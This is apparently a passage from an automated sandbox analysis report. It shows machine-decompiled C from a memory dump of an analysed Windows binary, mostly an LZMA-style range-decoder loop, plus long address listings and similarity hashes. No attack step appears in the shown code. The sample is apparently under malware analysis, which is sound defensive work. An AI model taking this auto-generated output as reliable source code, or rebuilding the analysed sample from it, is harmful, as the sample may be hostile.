                                                                                                                                                      							if( *(_t607 + 0x18) != 0) {
                                                                                                                                                      								goto L17;
                                                                                                                                                      							} else {
                                                                                                                                                      								E10004810(_t607 + 0x80);
                                                                                                                                                      								_t601 =  *((intOrPtr*)(_t607 + 0xc8));
                                                                                                                                                      								_t577 = _t607 + 0x98;
                                                                                                                                                      								_t446 = E10005E00(8, _t607 + 0x98,  *((intOrPtr*)(_t607 + 0xc0)), _t454,  *((intOrPtr*)(_t607 + 0xbc)),  *((intOrPtr*)(_t606 + 0x30)),  *((intOrPtr*)(_t606 + 0x34)),  *((intOrPtr*)(_t607 + 0xc8)));
                                                                                                                                                      								_t559 =  *((intOrPtr*)(_t607 + 0x9c));
                                                                                                                                                      								 *(_t607 + 0x44) = _t446;
                                                                                                                                                      								_t447 =  *((intOrPtr*)(_t607 + 0xd8));
                                                                                                                                                      								_t607 = _t607 + 0x18;
                                                                                                                                                      								 *_t447 = _t559;
                                                                                                                                                      								E10004840(_t577, _t601);
                                                                                                                                                      								__eflags =  *(_t607 + 0x2c);
                                                                                                                                                      								if( *(_t607 + 0x2c) == 0) {
                                                                                                                                                      									_t366 = E100049A0(_t454, _t607 + 0x14);
                                                                                                                                                      									__eflags = _t366;
                                                                                                                                                      									if(_t366 != 0) {
                                                                                                                                                      										goto L159;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t367 =  *(_t607 + 0x14);
                                                                                                                                                      										goto L17;
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									return  *(_t607 + 0x2c);
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t366 = E100049A0(_t560, _t607 + 0x44);
                                                                                                                                                      						if(_t366 != 0) {
                                                                                                                                                      							goto L159;
                                                                                                                                                      						} else {
                                                                                                                                                      							while(( *(_t607 + 0x44) |  *(_t607 + 0x48)) != 0) {
                                                                                                                                                      								_t366 = E10004B40(_t454);
                                                                                                                                                      								if(_t366 != 0) {
                                                                                                                                                      									goto L159;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t453 = E100049A0(_t454, _t607 + 0x44);
                                                                                                                                                      									if(_t453 == 0) {
                                                                                                                                                      										continue;
                                                                                                                                                      									} else {
                                                                                                                                                      										return _t453;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								goto L161;
                                                                                                                                                      							}
                                                                                                                                                      							_t366 = E100049A0(_t454, _t607 + 0x14);
                                                                                                                                                      							__eflags = _t366;
                                                                                                                                                      							if(_t366 != 0) {
                                                                                                                                                      								goto L159;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t367 =  *(_t607 + 0x14);
                                                                                                                                                      								goto L11;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L161:
                                                                                                                                                      			}













































































                                                                                                                                                      0x10006451
                                                                                                                                                      0x10006453
                                                                                                                                                      0x10006456
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000645c
                                                                                                                                                      0x10006463
                                                                                                                                                      0x10006468
                                                                                                                                                      0x1000646c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000646c
                                                                                                                                                      0x10006444
                                                                                                                                                      0x10006444
                                                                                                                                                      0x1000646f
                                                                                                                                                      0x1000647b
                                                                                                                                                      0x10006480
                                                                                                                                                      0x10006482
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006488
                                                                                                                                                      0x10006488
                                                                                                                                                      0x1000648c
                                                                                                                                                      0x10006492
                                                                                                                                                      0x10006496
                                                                                                                                                      0x10006499
                                                                                                                                                      0x10006499
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000648c
                                                                                                                                                      0x10006482
                                                                                                                                                      0x10006442
                                                                                                                                                      0x10006436
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065da
                                                                                                                                                      0x100065e1
                                                                                                                                                      0x100065e8
                                                                                                                                                      0x100065ea
                                                                                                                                                      0x100065eb
                                                                                                                                                      0x100065ec
                                                                                                                                                      0x100065ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065a4
                                                                                                                                                      0x100065ab
                                                                                                                                                      0x100065b2
                                                                                                                                                      0x100065b4
                                                                                                                                                      0x100065b5
                                                                                                                                                      0x100065b6
                                                                                                                                                      0x100065b6
                                                                                                                                                      0x100065b9
                                                                                                                                                      0x100065b9
                                                                                                                                                      0x100065c0
                                                                                                                                                      0x100065c4
                                                                                                                                                      0x100065c5
                                                                                                                                                      0x100065c6
                                                                                                                                                      0x100065c7
                                                                                                                                                      0x100065c8
                                                                                                                                                      0x100065cd
                                                                                                                                                      0x100065d0
                                                                                                                                                      0x100065d2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100064f1
                                                                                                                                                      0x100064f8
                                                                                                                                                      0x100064f8
                                                                                                                                                      0x100064fd
                                                                                                                                                      0x10006502
                                                                                                                                                      0x10006508
                                                                                                                                                      0x1000650a
                                                                                                                                                      0x10006512
                                                                                                                                                      0x10006514
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000651a
                                                                                                                                                      0x1000651a
                                                                                                                                                      0x1000651d
                                                                                                                                                      0x1000651f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006528
                                                                                                                                                      0x1000652b
                                                                                                                                                      0x1000652d
                                                                                                                                                      0x1000652f
                                                                                                                                                      0x10006532
                                                                                                                                                      0x10006534
                                                                                                                                                      0x10006536
                                                                                                                                                      0x1000653c
                                                                                                                                                      0x10006543
                                                                                                                                                      0x10006547
                                                                                                                                                      0x1000654c
                                                                                                                                                      0x1000654e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006554
                                                                                                                                                      0x10006554
                                                                                                                                                      0x10006558
                                                                                                                                                      0x1000655f
                                                                                                                                                      0x10006561
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006567
                                                                                                                                                      0x1000656e
                                                                                                                                                      0x10006571
                                                                                                                                                      0x10006575
                                                                                                                                                      0x1000657c
                                                                                                                                                      0x10006580
                                                                                                                                                      0x10006584
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006584
                                                                                                                                                      0x10006538
                                                                                                                                                      0x10006538
                                                                                                                                                      0x10006588
                                                                                                                                                      0x10006588
                                                                                                                                                      0x1000658c
                                                                                                                                                      0x1000658d
                                                                                                                                                      0x1000658e
                                                                                                                                                      0x10006590
                                                                                                                                                      0x10006592
                                                                                                                                                      0x10006597
                                                                                                                                                      0x1000659a
                                                                                                                                                      0x1000659c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065a2
                                                                                                                                                      0x100065f8
                                                                                                                                                      0x100065fe
                                                                                                                                                      0x10006603
                                                                                                                                                      0x10006605
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006615
                                                                                                                                                      0x10006615
                                                                                                                                                      0x10006615
                                                                                                                                                      0x10006605
                                                                                                                                                      0x1000659c
                                                                                                                                                      0x10006536
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006396
                                                                                                                                                      0x10006390
                                                                                                                                                      0x10006384
                                                                                                                                                      0x10006374
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000634b
                                                                                                                                                      0x1000661e
                                                                                                                                                      0x10006622
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000662e
                                                                                                                                                      0x10006633
                                                                                                                                                      0x10006635
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000663b
                                                                                                                                                      0x10006640
                                                                                                                                                      0x10006644
                                                                                                                                                      0x10006648
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000664c
                                                                                                                                                      0x10006651
                                                                                                                                                      0x10006653
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006659
                                                                                                                                                      0x1000665f
                                                                                                                                                      0x10006664
                                                                                                                                                      0x10006666
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006672
                                                                                                                                                      0x10006672
                                                                                                                                                      0x10006672
                                                                                                                                                      0x10006666
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006653
                                                                                                                                                      0x10006676
                                                                                                                                                      0x1000668a
                                                                                                                                                      0x1000681c
                                                                                                                                                      0x1000682a
                                                                                                                                                      0x10006831
                                                                                                                                                      0x10006834
                                                                                                                                                      0x10006836
                                                                                                                                                      0x10006838
                                                                                                                                                      0x1000683c
                                                                                                                                                      0x1000683c
                                                                                                                                                      0x1000683c
                                                                                                                                                      0x1000683c
                                                                                                                                                      0x10006843
                                                                                                                                                      0x10006843
                                                                                                                                                      0x10006851
                                                                                                                                                      0x10006856
                                                                                                                                                      0x100068ee
                                                                                                                                                      0x100068ee
                                                                                                                                                      0x100068f2
                                                                                                                                                      0x100068f2
                                                                                                                                                      0x100068f7
                                                                                                                                                      0x100068fa
                                                                                                                                                      0x1000691a
                                                                                                                                                      0x1000691a
                                                                                                                                                      0x1000691a
                                                                                                                                                      0x1000691a
                                                                                                                                                      0x1000691f
                                                                                                                                                      0x10006a13
                                                                                                                                                      0x10006a18
                                                                                                                                                      0x10006a1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a20
                                                                                                                                                      0x10006a20
                                                                                                                                                      0x10006a24
                                                                                                                                                      0x10006a2c
                                                                                                                                                      0x10006a30
                                                                                                                                                      0x10006a32
                                                                                                                                                      0x10006a34
                                                                                                                                                      0x10006a38
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a3e
                                                                                                                                                      0x10006a40
                                                                                                                                                      0x10006a44
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a44
                                                                                                                                                      0x10006a4a
                                                                                                                                                      0x10006a4f
                                                                                                                                                      0x10006a5e
                                                                                                                                                      0x10006a5e
                                                                                                                                                      0x10006a6e
                                                                                                                                                      0x10006a76
                                                                                                                                                      0x10006a76
                                                                                                                                                      0x10006a76
                                                                                                                                                      0x10006a7a
                                                                                                                                                      0x10006a51
                                                                                                                                                      0x10006a51
                                                                                                                                                      0x10006a55
                                                                                                                                                      0x10006a57
                                                                                                                                                      0x10006a59
                                                                                                                                                      0x10006a5c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a5c
                                                                                                                                                      0x10006a57
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a4f
                                                                                                                                                      0x10006925
                                                                                                                                                      0x10006927
                                                                                                                                                      0x1000692f
                                                                                                                                                      0x10006931
                                                                                                                                                      0x10006934
                                                                                                                                                      0x10006938
                                                                                                                                                      0x1000693b
                                                                                                                                                      0x1000693e
                                                                                                                                                      0x10006942
                                                                                                                                                      0x10006946
                                                                                                                                                      0x1000694a
                                                                                                                                                      0x1000694d
                                                                                                                                                      0x1000694f
                                                                                                                                                      0x10006951
                                                                                                                                                      0x10006953
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006959
                                                                                                                                                      0x1000695d
                                                                                                                                                      0x1000695f
                                                                                                                                                      0x10006961
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006961
                                                                                                                                                      0x10006967
                                                                                                                                                      0x10006969
                                                                                                                                                      0x1000696b
                                                                                                                                                      0x1000696d
                                                                                                                                                      0x10006971
                                                                                                                                                      0x10006975
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000697b
                                                                                                                                                      0x1000697d
                                                                                                                                                      0x1000697f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000697f
                                                                                                                                                      0x10006985
                                                                                                                                                      0x1000698a
                                                                                                                                                      0x100069cf
                                                                                                                                                      0x100069cf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000698c
                                                                                                                                                      0x1000698c
                                                                                                                                                      0x1000698f
                                                                                                                                                      0x10006991
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006993
                                                                                                                                                      0x10006993
                                                                                                                                                      0x100069a1
                                                                                                                                                      0x100069a8
                                                                                                                                                      0x100069ab
                                                                                                                                                      0x100069ad
                                                                                                                                                      0x100069d3
                                                                                                                                                      0x100069d3
                                                                                                                                                      0x100069d8
                                                                                                                                                      0x100069e7
                                                                                                                                                      0x100069e7
                                                                                                                                                      0x100069f0
                                                                                                                                                      0x100069fa
                                                                                                                                                      0x100069fa
                                                                                                                                                      0x100069fa
                                                                                                                                                      0x100069fe
                                                                                                                                                      0x100069da
                                                                                                                                                      0x100069da
                                                                                                                                                      0x100069de
                                                                                                                                                      0x100069e0
                                                                                                                                                      0x100069e2
                                                                                                                                                      0x100069e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100069e5
                                                                                                                                                      0x100069e0
                                                                                                                                                      0x10006a05
                                                                                                                                                      0x100069af
                                                                                                                                                      0x100069b8
                                                                                                                                                      0x100069bf
                                                                                                                                                      0x100069c6
                                                                                                                                                      0x100069c6
                                                                                                                                                      0x100069ad
                                                                                                                                                      0x10006991
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000698a
                                                                                                                                                      0x100068fc
                                                                                                                                                      0x10006906
                                                                                                                                                      0x1000690b
                                                                                                                                                      0x1000690e
                                                                                                                                                      0x10006910
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006916
                                                                                                                                                      0x10006916
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006916
                                                                                                                                                      0x10006910
                                                                                                                                                      0x1000685c
                                                                                                                                                      0x1000685f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000685f
                                                                                                                                                      0x10006856
                                                                                                                                                      0x10006812
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a7d
                                                                                                                                                      0x10006a81
                                                                                                                                                      0x10006a85
                                                                                                                                                      0x10006a88
                                                                                                                                                      0x10006a8c

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: baacfdb0298eb98a6c54e2f5c55f6a732fa9040cff60af18b8a8e558c0dc3850
                                                                                                                                                      • Instruction ID: 61d3ccd6a23604d47a57db8de3889c3396fcc74338933db4fa832e0d0e218fb6
                                                                                                                                                      • Opcode Fuzzy Hash: baacfdb0298eb98a6c54e2f5c55f6a732fa9040cff60af18b8a8e558c0dc3850
                                                                                                                                                      • Instruction Fuzzy Hash: 34627DB56083818FE710CF24C880A5AB7E2EFC9394F25492DF88497359D731ED45CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                      			E10009257(unsigned int __eax, void* __ecx, signed int __edx, signed int __esi) {
                                                                                                                                                      				unsigned int _t495;
                                                                                                                                                      				unsigned int _t496;
                                                                                                                                                      				unsigned int _t497;
                                                                                                                                                      				unsigned int _t498;
                                                                                                                                                      				unsigned int _t499;
                                                                                                                                                      				unsigned int _t500;
                                                                                                                                                      				unsigned int _t501;
                                                                                                                                                      				unsigned int _t502;
                                                                                                                                                      				unsigned int _t508;
                                                                                                                                                      				unsigned int _t509;
                                                                                                                                                      				unsigned int _t510;
                                                                                                                                                      				unsigned int _t511;
                                                                                                                                                      				unsigned int _t512;
                                                                                                                                                      				unsigned int _t515;
                                                                                                                                                      				unsigned int _t516;
                                                                                                                                                      				unsigned int _t517;
                                                                                                                                                      				unsigned int _t518;
                                                                                                                                                      				unsigned int _t519;
                                                                                                                                                      				unsigned int _t520;
                                                                                                                                                      				unsigned int _t521;
                                                                                                                                                      				unsigned int _t522;
                                                                                                                                                      				unsigned int _t523;
                                                                                                                                                      				unsigned int _t524;
                                                                                                                                                      				unsigned int _t525;
                                                                                                                                                      				unsigned int _t526;
                                                                                                                                                      				unsigned int _t527;
                                                                                                                                                      				unsigned int _t528;
                                                                                                                                                      				unsigned int _t529;
                                                                                                                                                      				unsigned int _t530;
                                                                                                                                                      				unsigned int _t531;
                                                                                                                                                      				unsigned int _t532;
                                                                                                                                                      				unsigned int _t533;
                                                                                                                                                      				unsigned int _t534;
                                                                                                                                                      				unsigned int _t535;
                                                                                                                                                      				unsigned int _t536;
                                                                                                                                                      				unsigned int _t537;
                                                                                                                                                      				unsigned int _t538;
                                                                                                                                                      				unsigned int _t539;
                                                                                                                                                      				signed int _t542;
                                                                                                                                                      				signed int _t543;
                                                                                                                                                      				void* _t544;
                                                                                                                                                      				void* _t546;
                                                                                                                                                      				void* _t555;
                                                                                                                                                      				void* _t556;
                                                                                                                                                      				void* _t557;
                                                                                                                                                      				void* _t558;
                                                                                                                                                      				void* _t559;
                                                                                                                                                      				unsigned int _t562;
                                                                                                                                                      				unsigned int _t568;
                                                                                                                                                      				unsigned int _t571;
                                                                                                                                                      				unsigned int _t573;
                                                                                                                                                      				unsigned int _t575;
                                                                                                                                                      				unsigned int _t584;
                                                                                                                                                      				void* _t604;
                                                                                                                                                      				unsigned int _t607;
                                                                                                                                                      				void* _t622;
                                                                                                                                                      				unsigned int _t625;
                                                                                                                                                      				unsigned int _t648;
                                                                                                                                                      				signed int _t650;
                                                                                                                                                      				signed int _t651;
                                                                                                                                                      				unsigned int _t656;
                                                                                                                                                      				signed int _t660;
                                                                                                                                                      				unsigned int _t665;
                                                                                                                                                      				signed int _t669;
                                                                                                                                                      				unsigned int _t674;
                                                                                                                                                      				signed int _t678;
                                                                                                                                                      				unsigned int _t683;
                                                                                                                                                      				signed int _t687;
                                                                                                                                                      				unsigned int _t692;
                                                                                                                                                      				signed int _t727;
                                                                                                                                                      				void* _t728;
                                                                                                                                                      				void* _t729;
                                                                                                                                                      				void* _t730;
                                                                                                                                                      				void* _t731;
                                                                                                                                                      				void* _t732;
                                                                                                                                                      				void* _t733;
                                                                                                                                                      				unsigned int _t737;
                                                                                                                                                      				unsigned int _t740;
                                                                                                                                                      				signed int _t744;
                                                                                                                                                      				unsigned int _t747;
                                                                                                                                                      				unsigned int _t749;
                                                                                                                                                      				signed int _t751;
                                                                                                                                                      				signed int _t753;
                                                                                                                                                      				signed int _t756;
                                                                                                                                                      				signed int _t761;
                                                                                                                                                      				void* _t764;
                                                                                                                                                      				unsigned int _t765;
                                                                                                                                                      				signed int _t767;
                                                                                                                                                      				void* _t769;
                                                                                                                                                      				intOrPtr _t772;
                                                                                                                                                      				signed int _t776;
                                                                                                                                                      				void* _t777;
                                                                                                                                                      				signed int _t781;
                                                                                                                                                      				signed int _t784;
                                                                                                                                                      				signed char _t787;
                                                                                                                                                      				void* _t788;
                                                                                                                                                      				unsigned int _t789;
                                                                                                                                                      				signed int _t791;
                                                                                                                                                      				signed int _t792;
                                                                                                                                                      				signed int _t793;
                                                                                                                                                      				unsigned int _t796;
                                                                                                                                                      				signed int _t799;
                                                                                                                                                      				unsigned int _t800;
                                                                                                                                                      				signed char* _t807;
                                                                                                                                                      				signed char* _t809;
                                                                                                                                                      				unsigned int _t813;
                                                                                                                                                      				signed int _t816;
                                                                                                                                                      				unsigned int _t817;
                                                                                                                                                      				void* _t819;
                                                                                                                                                      				signed char* _t826;
                                                                                                                                                      				signed char* _t828;
                                                                                                                                                      				unsigned int _t832;
                                                                                                                                                      				signed int _t839;
                                                                                                                                                      				signed int _t847;
                                                                                                                                                      				signed int _t848;
                                                                                                                                                      				signed int _t853;
                                                                                                                                                      				signed int _t859;
                                                                                                                                                      				signed int _t860;
                                                                                                                                                      				signed int _t861;
                                                                                                                                                      				signed int _t862;
                                                                                                                                                      				signed int _t863;
                                                                                                                                                      				signed int _t864;
                                                                                                                                                      				signed int _t865;
                                                                                                                                                      				unsigned int _t866;
                                                                                                                                                      				unsigned int _t871;
                                                                                                                                                      				signed int _t873;
                                                                                                                                                      				unsigned int _t874;
                                                                                                                                                      				unsigned int _t876;
                                                                                                                                                      				unsigned int _t878;
                                                                                                                                                      				unsigned int _t880;
                                                                                                                                                      				unsigned int _t882;
                                                                                                                                                      				unsigned int _t884;
                                                                                                                                                      				unsigned int _t886;
                                                                                                                                                      				signed int _t890;
                                                                                                                                                      				signed int _t891;
                                                                                                                                                      				signed int _t892;
                                                                                                                                                      				signed int _t893;
                                                                                                                                                      				signed int _t894;
                                                                                                                                                      				unsigned int _t903;
                                                                                                                                                      				signed int _t947;
                                                                                                                                                      				unsigned int _t949;
                                                                                                                                                      				unsigned int _t951;
                                                                                                                                                      				signed int _t955;
                                                                                                                                                      				signed int _t960;
                                                                                                                                                      				signed char* _t962;
                                                                                                                                                      				unsigned int _t968;
                                                                                                                                                      				unsigned int _t973;
                                                                                                                                                      				unsigned int _t978;
                                                                                                                                                      				unsigned int _t983;
                                                                                                                                                      				unsigned int _t988;
                                                                                                                                                      				unsigned int _t991;
                                                                                                                                                      				signed int _t997;
                                                                                                                                                      				signed int _t1000;
                                                                                                                                                      				unsigned int _t1002;
                                                                                                                                                      				signed char* _t1029;
                                                                                                                                                      				unsigned int _t1036;
                                                                                                                                                      				unsigned int _t1040;
                                                                                                                                                      				unsigned int _t1043;
                                                                                                                                                      				unsigned int _t1052;
                                                                                                                                                      				unsigned int _t1056;
                                                                                                                                                      				unsigned int _t1059;
                                                                                                                                                      				unsigned int _t1074;
                                                                                                                                                      				signed int _t1077;
                                                                                                                                                      				signed short* _t1080;
                                                                                                                                                      				unsigned int _t1081;
                                                                                                                                                      				signed int _t1084;
                                                                                                                                                      				signed short* _t1085;
                                                                                                                                                      				unsigned int _t1086;
                                                                                                                                                      				signed int _t1089;
                                                                                                                                                      				signed short* _t1090;
                                                                                                                                                      				unsigned int _t1091;
                                                                                                                                                      				signed int _t1094;
                                                                                                                                                      				signed short* _t1095;
                                                                                                                                                      				unsigned int _t1096;
                                                                                                                                                      				signed int _t1099;
                                                                                                                                                      				signed short* _t1100;
                                                                                                                                                      				unsigned int _t1101;
                                                                                                                                                      				signed int _t1104;
                                                                                                                                                      				signed short* _t1105;
                                                                                                                                                      				unsigned int _t1106;
                                                                                                                                                      				signed int _t1112;
                                                                                                                                                      				unsigned int _t1115;
                                                                                                                                                      				signed char* _t1124;
                                                                                                                                                      				unsigned int _t1141;
                                                                                                                                                      				unsigned int _t1146;
                                                                                                                                                      				unsigned int _t1151;
                                                                                                                                                      				unsigned int _t1156;
                                                                                                                                                      				unsigned int _t1161;
                                                                                                                                                      				unsigned int _t1166;
                                                                                                                                                      				unsigned int _t1171;
                                                                                                                                                      				unsigned int _t1176;
                                                                                                                                                      				signed char* _t1185;
                                                                                                                                                      				signed int _t1223;
                                                                                                                                                      				unsigned int _t1228;
                                                                                                                                                      				unsigned int _t1231;
                                                                                                                                                      				unsigned int _t1235;
                                                                                                                                                      				unsigned int _t1240;
                                                                                                                                                      				signed int _t1246;
                                                                                                                                                      				void* _t1250;
                                                                                                                                                      				signed int _t1251;
                                                                                                                                                      				void* _t1253;
                                                                                                                                                      				unsigned int _t1254;
                                                                                                                                                      				signed int _t1256;
                                                                                                                                                      				unsigned int _t1257;
                                                                                                                                                      				unsigned int _t1259;
                                                                                                                                                      				unsigned int _t1261;
                                                                                                                                                      				unsigned int _t1263;
                                                                                                                                                      				void* _t1265;
                                                                                                                                                      				signed int _t1268;
                                                                                                                                                      				signed int _t1269;
                                                                                                                                                      				signed int _t1271;
                                                                                                                                                      				signed char* _t1276;
                                                                                                                                                      				signed char* _t1282;
                                                                                                                                                      				unsigned int _t1285;
                                                                                                                                                      				signed int _t1287;
                                                                                                                                                      				signed char* _t1293;
                                                                                                                                                      				void* _t1299;
                                                                                                                                                      				short* _t1300;
                                                                                                                                                      				signed int _t1301;
                                                                                                                                                      				signed int _t1303;
                                                                                                                                                      				signed int _t1305;
                                                                                                                                                      				signed int _t1307;
                                                                                                                                                      				signed char* _t1309;
                                                                                                                                                      				signed int _t1311;
                                                                                                                                                      				intOrPtr _t1313;
                                                                                                                                                      				char* _t1315;
                                                                                                                                                      				signed char* _t1316;
                                                                                                                                                      				signed char* _t1318;
                                                                                                                                                      				unsigned int _t1321;
                                                                                                                                                      				unsigned int _t1326;
                                                                                                                                                      				unsigned int _t1331;
                                                                                                                                                      				void* _t1351;
                                                                                                                                                      				intOrPtr _t1353;
                                                                                                                                                      				signed int _t1358;
                                                                                                                                                      				signed int _t1359;
                                                                                                                                                      				unsigned int _t1362;
                                                                                                                                                      				void* _t1366;
                                                                                                                                                      				void* _t1367;
                                                                                                                                                      				void* _t1368;
                                                                                                                                                      				void* _t1369;
                                                                                                                                                      				void* _t1370;
                                                                                                                                                      				void* _t1371;
                                                                                                                                                      				signed char* _t1378;
                                                                                                                                                      				char _t1379;
                                                                                                                                                      				void* _t1381;
                                                                                                                                                      
				_t1223 = __esi;
				_t890 = __edx;
				_t495 = __eax;
				while(1) {
					L153:
					_t544 = _t764 + _t764;
					_t765 =  *(_t544 + _t1246 + 0x200) & 0x0000ffff;
					if(_t502 < 0x1000000) {
						_t502 = _t502 << 8;
						_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
						 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
					}
					_t955 = (_t502 >> 0xb) * _t765;
					if(_t890 >= _t955) {
						_t502 = _t502 - _t955;
						_t890 = _t890 - _t955;
						 *(_t544 + _t1246 + 0x200) = _t765 - (_t765 >> 5);
						_t764 = _t544 + 1;
					} else {
						_t502 = _t955;
						 *(_t544 + _t1246 + 0x200) = (0x800 - _t765 >> 5) + _t765;
						_t764 = _t544;
					}
					if(_t764 < 0x100) {
						continue;
					}
					L159:
					_t767 = _t764 - 0xf0;
					while(1) {
						 *(_t1381 + 0x30) = _t767;
						if( *(_t1381 + 0x14) < 0xc) {
							goto L231;
						}
						L161:
						if(_t767 >= 4) {
							_t767 = 3;
						}
						_t776 = _t767 + 1 << 7;
						_t1254 =  *(_t776 + _t1311 + 2) & 0x0000ffff;
						_t777 = _t776 + _t1311;
						if(_t502 < 0x1000000) {
							_t1029 =  *(_t1381 + 0x10);
							_t502 = _t502 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1029 & 0x000000ff;
							 *(_t1381 + 0x10) =  &(_t1029[1]);
						}
						_t968 = (_t502 >> 0xb) * _t1254;
						if(_t890 >= _t968) {
							_t508 = _t502 - _t968;
							_t890 = _t890 - _t968;
							 *((short*)(_t777 + 2)) = _t1254 - (_t1254 >> 5);
							_t1256 = 3;
						} else {
							_t508 = _t968;
							 *((short*)(_t777 + 2)) = (0x800 - _t1254 >> 5) + _t1254;
							_t1256 = 2;
						}
						_t1316 =  *(_t1381 + 0x10);
						_t556 = _t1256 + _t1256;
						_t1257 =  *(_t556 + _t777) & 0x0000ffff;
						if(_t508 < 0x1000000) {
							_t508 = _t508 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							_t1316 =  &(_t1316[1]);
							 *(_t1381 + 0x10) = _t1316;
						}
						_t973 = (_t508 >> 0xb) * _t1257;
						if(_t890 >= _t973) {
							_t509 = _t508 - _t973;
							_t890 = _t890 - _t973;
							 *(_t556 + _t777) = _t1257 - (_t1257 >> 5);
							_t556 = _t556 + 1;
						} else {
							_t509 = _t973;
							 *(_t556 + _t777) = (0x800 - _t1257 >> 5) + _t1257;
						}
						_t557 = _t556 + _t556;
						_t1259 =  *(_t557 + _t777) & 0x0000ffff;
						if(_t509 < 0x1000000) {
							_t509 = _t509 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							_t1316 =  &(_t1316[1]);
							 *(_t1381 + 0x10) = _t1316;
						}
						_t978 = (_t509 >> 0xb) * _t1259;
						if(_t890 >= _t978) {
							_t510 = _t509 - _t978;
							_t890 = _t890 - _t978;
							 *(_t557 + _t777) = _t1259 - (_t1259 >> 5);
							_t557 = _t557 + 1;
						} else {
							_t510 = _t978;
							 *(_t557 + _t777) = (0x800 - _t1259 >> 5) + _t1259;
						}
						_t558 = _t557 + _t557;
						_t1261 =  *(_t558 + _t777) & 0x0000ffff;
						if(_t510 < 0x1000000) {
							_t510 = _t510 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							_t1316 =  &(_t1316[1]);
							 *(_t1381 + 0x10) = _t1316;
						}
						_t983 = (_t510 >> 0xb) * _t1261;
						if(_t890 >= _t983) {
							_t511 = _t510 - _t983;
							_t890 = _t890 - _t983;
							 *(_t558 + _t777) = _t1261 - (_t1261 >> 5);
							_t558 = _t558 + 1;
						} else {
							_t511 = _t983;
							 *(_t558 + _t777) = (0x800 - _t1261 >> 5) + _t1261;
						}
						_t559 = _t558 + _t558;
						_t1263 =  *(_t559 + _t777) & 0x0000ffff;
						if(_t511 < 0x1000000) {
							_t511 = _t511 << 8;
